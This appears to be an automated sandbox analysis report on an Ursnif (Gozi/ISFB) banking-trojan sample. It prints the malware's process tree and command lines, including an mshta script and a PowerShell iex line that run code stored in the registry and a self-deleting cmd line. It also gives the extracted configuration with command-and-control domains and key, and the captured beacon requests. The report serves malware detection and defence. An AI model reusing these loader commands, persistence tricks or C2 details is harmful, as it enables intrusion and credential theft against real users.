Loading ...

Play interactive tourEdit tour

Windows Analysis Report FpYf5EGDO9.exe

Overview

General Information

Sample Name:FpYf5EGDO9.exe
Analysis ID:527488
MD5:2f1743897afa6f586ae97f53bf55c14e
SHA1:21a51f4a3fa0c65509a1c7ef640f7e6b779aee49
SHA256:440c297bcaa0e4ca3d84281d524b8351ad1ea2b5aabb22795db824a356cd54bd
Tags:exeGoziISFBUrsnif
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (overwrites its own PE header)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Found malware configuration
Sigma detected: Powershell run code from registry
Multi AV Scanner detection for submitted file
Sigma detected: Encoded IEX
Tries to steal Mail credentials (via file / registry access)
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Uses nslookup.exe to query domains
Writes or reads registry keys via WMI
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Modifies the prolog of user mode functions (user mode inline hooks)
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the import address table of user mode modules (user mode IAT hooks)
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info

Classification

Process Tree

  • System is w10x64
  • FpYf5EGDO9.exe (PID: 5556 cmdline: "C:\Users\user\Desktop\FpYf5EGDO9.exe" MD5: 2F1743897AFA6F586AE97F53BF55C14E)
    • control.exe (PID: 2904 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 7028 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\FpYf5EGDO9.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 4712 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
        • RuntimeBroker.exe (PID: 4084 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • RuntimeBroker.exe (PID: 4176 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • RuntimeBroker.exe (PID: 4440 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • RuntimeBroker.exe (PID: 4544 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 6536 cmdline: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\2227.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 6736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • nslookup.exe (PID: 5192 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)
        • RuntimeBroker.exe (PID: 1504 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 3424 cmdline: cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\2227.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 6088 cmdline: "C:\Windows\syswow64\cmd.exe" /C pause dll mail, , MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • rundll32.exe (PID: 6080 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • mshta.exe (PID: 4720 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Mq8m='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mq8m).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 4856 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 4488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6736 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6272 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDB8.tmp" "c:\Users\user\AppData\Local\Temp\CSCDF07F97C5B754580AFABDA449268F624.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 5464 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4v5gswf4.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6088 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A77.tmp" "c:\Users\user\AppData\Local\Temp\CSCB9A7ABF6D51B4A89B4972FF51D6A5D9.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "dm+RfNkITE5FceWriGPYkZaFfoP/k2XQ2jeLd8rNgFw6gJ6fNWsHd0U6akxsQHth/SBWm4/eMI9Y1qgwNJteasgQsUC7Ht20y96mIxH1hvPh9uvLSH5z2CNo+fcP8K+V0yoOOQzDln/qE7mMJHLu+rmogHE7S6lb7FVy/7xxrRe3zMDt5K9bDwOreWw0blGE", "c2_domain": ["yahoo.com", "soderunovos.website", "qoderunovos.website", "https://soderunovos.website", "https://qoderunovos.website"], "botnet": "4482", "server": "12", "serpent_key": "10291029JSJUYNHG", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "dga_base_url": "constitution.org/usdeclar.txt", "dga_tld": "com ru org", "DGA_count": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    0000001F.00000000.537482070.000001B888D00000.00000040.00020000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
      00000024.00000000.646320070.000001EAE4570000.00000040.00020000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
        0000001F.00000000.536149519.000001B888D00000.00000040.00020000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
          0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 61 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.3.FpYf5EGDO9.exe.43394a0.11.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              0.3.FpYf5EGDO9.exe.48794a0.3.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                0.3.FpYf5EGDO9.exe.47fa4a0.1.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  0.3.FpYf5EGDO9.exe.47fa4a0.1.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    0.2.FpYf5EGDO9.exe.3c40000.2.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 2 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Encoded IEXShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Mq8m='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mq8m).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4720, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 4856
                      Sigma detected: MSHTA Spawning Windows ShellShow sources
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Mq8m='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mq8m).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4720, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 4856
                      Sigma detected: Mshta Spawning Windows ShellShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Mq8m='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mq8m).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4720, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 4856
                      Sigma detected: Suspicious Csc.exe Source File FolderShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4856, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline, ProcessId: 6736
                      Sigma detected: Suspicious Rundll32 ActivityShow sources
                      Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 2904, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, ProcessId: 6080
                      Sigma detected: Non Interactive PowerShellShow sources
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Mq8m='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mq8m).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4720, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 4856
                      Sigma detected: T1086 PowerShell ExecutionShow sources
                      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132822035693761408.4856.DefaultAppDomain.powershell

                      Data Obfuscation:

                      barindex
                      Sigma detected: Powershell run code from registryShow sources
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Mq8m='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mq8m).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4720, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 4856

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 00000000.00000002.510101213.0000000002140000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "dm+RfNkITE5FceWriGPYkZaFfoP/k2XQ2jeLd8rNgFw6gJ6fNWsHd0U6akxsQHth/SBWm4/eMI9Y1qgwNJteasgQsUC7Ht20y96mIxH1hvPh9uvLSH5z2CNo+fcP8K+V0yoOOQzDln/qE7mMJHLu+rmogHE7S6lb7FVy/7xxrRe3zMDt5K9bDwOreWw0blGE", "c2_domain": ["yahoo.com", "soderunovos.website", "qoderunovos.website", "https://soderunovos.website", "https://qoderunovos.website"], "botnet": "4482", "server": "12", "serpent_key": "10291029JSJUYNHG", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "dga_base_url": "constitution.org/usdeclar.txt", "dga_tld": "com ru org", "DGA_count": "10"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: FpYf5EGDO9.exeVirustotal: Detection: 46%Perma Link
                      Machine Learning detection for sampleShow sources
                      Source: FpYf5EGDO9.exeJoe Sandbox ML: detected
                      Source: 0.2.FpYf5EGDO9.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
                      Source: 0.2.FpYf5EGDO9.exe.2140e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 0.3.FpYf5EGDO9.exe.2150000.0.unpackAvira: Label: TR/Patched.Ren.Gen

                      Compliance:

                      barindex
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\user\Desktop\FpYf5EGDO9.exeUnpacked PE file: 0.2.FpYf5EGDO9.exe.400000.0.unpack
                      Source: FpYf5EGDO9.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\FpYf5EGDO9.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: unknownHTTPS traffic detected: 74.6.143.26:443 -> 192.168.2.3:49747 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 87.248.100.216:443 -> 192.168.2.3:49748 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 89.44.9.140:443 -> 192.168.2.3:49751 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 209.202.254.90:443 -> 192.168.2.3:49817 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 209.202.254.90:443 -> 192.168.2.3:49818 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.3:49820 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 212.82.100.140:443 -> 192.168.2.3:49821 version: TLS 1.2
                      Source: Binary string: .C:\Users\user\AppData\Local\Temp\4v5gswf4.pdb source: powershell.exe, 0000000E.00000002.590858233.000001A9845FD000.00000004.00000001.sdmp
                      Source: Binary string: .C:\Users\user\AppData\Local\Temp\4v5gswf4.pdbXP source: powershell.exe, 0000000E.00000002.590858233.000001A9845FD000.00000004.00000001.sdmp
                      Source: Binary string: SC:\gapajoxo-luhibomihi za.pdbP+CD source: FpYf5EGDO9.exe
                      Source: Binary string: C:\gapajoxo-luhibomihi za.pdb source: FpYf5EGDO9.exe
                      Source: Binary string: ntdll.pdb source: FpYf5EGDO9.exe, 00000000.00000003.458681957.0000000005D50000.00000004.00000001.sdmp
                      Source: Binary string: ntdll.pdbUGP source: FpYf5EGDO9.exe, 00000000.00000003.458681957.0000000005D50000.00000004.00000001.sdmp
                      Source: Binary string: .C:\Users\user\AppData\Local\Temp\i1aaekli.pdb source: powershell.exe, 0000000E.00000002.590639322.000001A9845B8000.00000004.00000001.sdmp
                      Source: Binary string: .C:\Users\user\AppData\Local\Temp\i1aaekli.pdbXP source: powershell.exe, 0000000E.00000002.590858233.000001A9845FD000.00000004.00000001.sdmp
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 44_2_0374A2FE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,44_2_0374A2FE
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 44_2_0373E9AC memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,44_2_0373E9AC

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\explorer.exeDomain query: lycos.com
                      Source: C:\Windows\explorer.exeDomain query: mail.yahoo.com
                      Source: C:\Windows\explorer.exeDomain query: login.yahoo.com
                      Source: C:\Windows\explorer.exeDomain query: www.lycos.com
                      Uses nslookup.exe to query domainsShow sources
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      May check the online IP address of the machineShow sources
                      Source: C:\Windows\System32\nslookup.exeDNS query: name: myip.opendns.com
                      Source: C:\Windows\System32\nslookup.exeDNS query: name: myip.opendns.com
                      Uses ping.exe to check the status of other devices and networksShow sources
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: Joe Sandbox ViewJA3 fingerprint: 57f3642b4e37e28f5cbe3020c9331b4c
                      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                      Source: global trafficHTTP traffic detected: GET /jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: yahoo.comConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Connection: Keep-AliveCache-Control: no-cacheHost: www.yahoo.comCookie: B=emaekhlgpqi05&b=3&s=ke
                      Source: global trafficHTTP traffic detected: GET /jdraw/0YhG8dyRv9LD/mE_2FqtpH8f/iA2o2vkhZI6Ka5/bM6HfTgg8_2Fnm82bns_2/FQ3LtU8rWKiGuaw8/NuVUF4C1kJEvzo9/4q_2FzKx_2BoAuXF6T/M0a9puLXo/g7QZ3Z41pnSqstIxrJFr/XQfDXm0MsROvBP6zJyK/pIVUVQiiCBcAOAJCd7Rzb1/y_2BZhUKXYwpc/xuZh04Cte3g_2F/_2Bc.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /jdraw/8_2FELbHd/vcKlysS2_2B8o4xm4kBA/fbRTQSqR8KhaRfcmG4D/_2BYwGT6a_2BctWO8vLxko/alAFtnlNlG6Q7/I30RLNMi/fUrGHRWZ_2Br2a8odLCOSy2/Pp0uf39xNF/zw_2Bgb01eHiph9fS/HUtF_2BI_2FW/KJsziSAbwfK/PI_2FrcgGvn_2F/if7htk49j1cWEP5dTbASH/YfWHdUallNi/oU.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=hvn8dm2743er2gc0b5q06914n7; lang=en
                      Source: global trafficHTTP traffic detected: GET /jdraw/4HxkLkhxWL_2FVANLY1/THbawZOPrnWBhU0uh241NM/FRF0QIjHzIK9t/dTYxInYO/rat2KiIdmFuMYJV01lFIUuv/pv1M_2F42q/2ghlrrK6HyvaK1iGn/6FWd3U6RwdJs/DwljQfV1T1s/A2jFEhH_2FVbra/gemmgKqmTU3dGSSrHsVgF/6KFwQzXOgNC787ml/o9EUNqnCP/_2FVV.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=hvn8dm2743er2gc0b5q06914n7; lang=en
